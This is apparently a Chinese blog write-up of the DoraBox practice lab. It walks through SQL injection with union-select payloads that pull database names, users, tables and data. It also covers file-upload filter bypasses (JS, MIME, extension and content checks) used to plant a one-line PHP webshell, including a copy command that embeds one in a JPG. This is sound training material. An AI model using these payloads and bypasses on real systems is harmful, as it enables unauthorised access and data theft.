DoraBox sql注入&文件上传

SQL注入

1.sqli数字型

:判断是否存在注入点,执行1 and 1=1,有回显,再执行1 and 1=2发现回显不同,判断存在注入点
DoraBox sql注入&文件上传
:判断字段数,执行1 order by 3以及执行1 order by 4时报错,判断字段数为3
DoraBox sql注入&文件上传
:判断具体回显位,执行-1 union select 1,2,3
DoraBox sql注入&文件上传
:获取数据库名和当前用户名,执行-1 union select 1,database(),user()
DoraBox sql注入&文件上传
:执行 -1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3
得到表名
DoraBox sql注入&文件上传
:执行 -1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='news'),3
得到表news的字段
DoraBox sql注入&文件上传
:执行 -1 union select 1,(select group_concat(title) from news),3
得到字段title下的数据
DoraBox sql注入&文件上传

2.sqli字符型

字符型顾名思义,就是SQL语句中值读取为字符

补充以下:
0x3a即是冒号DoraBox sql注入&文件上传
但是这里我有一个问题是:这样查询得到的数据不完整,并不能全部查到,不知道是不是命令输入错误

:判断是否存在注入点,执行1,然后执行1'(出现报错),再执行1'#,如下
DoraBox sql注入&文件上传
:余下和第一题一样,只是注意(#)

3.sqli搜索型

搜索型,没听过,那就随便输入观察回显的语句吧
DoraBox sql注入&文件上传
出现了%的闭合方式,执行1%’,报错,执行1%’#,有回显,余下和第一题相同

文件上传

1.任意文件上传

任意文件上传的话,就是可以随便上传文件,因为可以随便上传文件,所以危险极大,可以上传一句话木马,然后用菜刀等工具链接

2.js限制文件上传

先随便上传一个试试,得到一个这个
DoraBox sql注入&文件上传
:可以在此处对允许上传的文件类型直接进行修改或者,或者禁用JavaScript,再或者使用burp suite抓包,改后缀名
DoraBox sql注入&文件上传
:可能是有限制,在这里不能修改,先尝试禁用JavaScript,火狐浏览器中,如下,将true改为false即可
DoraBox sql注入&文件上传经过尝试,可以上传,上传成功后就可以链接菜刀了
DoraBox sql注入&文件上传
:再尝试抓包吧,编写一个一句话木马,将一句话木马后缀写成可上传的,通过抓包进行修改后缀名,将后缀名改回php
DoraBox sql注入&文件上传
DoraBox sql注入&文件上传

放包,就发现上传成功了,然后就可以连菜刀
DoraBox sql注入&文件上传

3.mime限制文件上传

:先试着上传,当上传文件位php文件时显示文件类型不对,搜索一下什么叫mime验证
DoraBox sql注入&文件上传

MIME的作用 : 使客户端软件,区分不同种类的数据,例如web浏览器就是通过MIME类型来判断文件是GIF图片,还是可打印的PostScript文件。
资料:https://blog.****.net/h254532693/article/details/45128117
多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式每个MIME类型由两部分组成,前面是数据的大类别,例如声音 audio、图象 Image等,后面定义具体的种类。

另外补充:
Content-Type
MediaType,即是Internet Media Type,互联网媒体类型;也叫做MIME类型,在Http协议消息头中,使用Content-Type来表示具体请求中的媒体类型信息。
资料:https://www.fujieace.com/penetration-test/file-upload-mime.html
http请求的头文件资料:https://www.cnblogs.com/klb561/p/10090540.html

:由以上资料可得出,我们需要修改content-type来让php文件正常上传,利用burp suite抓包进行修改
DoraBox sql注入&文件上传
:将箭头所指方向修改成image/jpeg,或者其他的可上传的类型,放包,文件成功上传
DoraBox sql注入&文件上传

4.扩展名限制文件上传

资料:https://www.cnblogs.com/zhaijiahui/p/10789251.html#autoid-5-2-0
:根据资料我们进行尝试,利用大小写等方法,修改为1.php.jpg以及1.pHp都可以绕过,进行上传

5.内容限制文件上传

:首先,内容限制,很明显修改后缀的方式不适用了,对此有两种方法

*头文件欺骗 —> 利用文件上传过程中图像大小及相关信息检测,通常我们会使用getimagesize()函数,此函数会返回一个数组,使用getimagesize()函数检测,会判断文件是否是一个有效的图片文件,如果不是则会报错,我们可以使用文件头欺骗来绕过
资料:https://blog.****.net/zhijiandedaima/article/details/81506666

*利用copy命令合成一个图片马
资料:https://blog.****.net/qq_35669659/article/details/100584579

:随便找一张后缀为.jpg(或者其他可上传的后缀)图片,然后写一个一句话木马的php文件
:利用copy命令copy 1.jpg /b + 1.php /a 2.jpg
(这里两个文件要放在一个目录下)
DoraBox sql注入&文件上传
:可以得到一个包含有php内容的jpg文件,成功上传
DoraBox sql注入&文件上传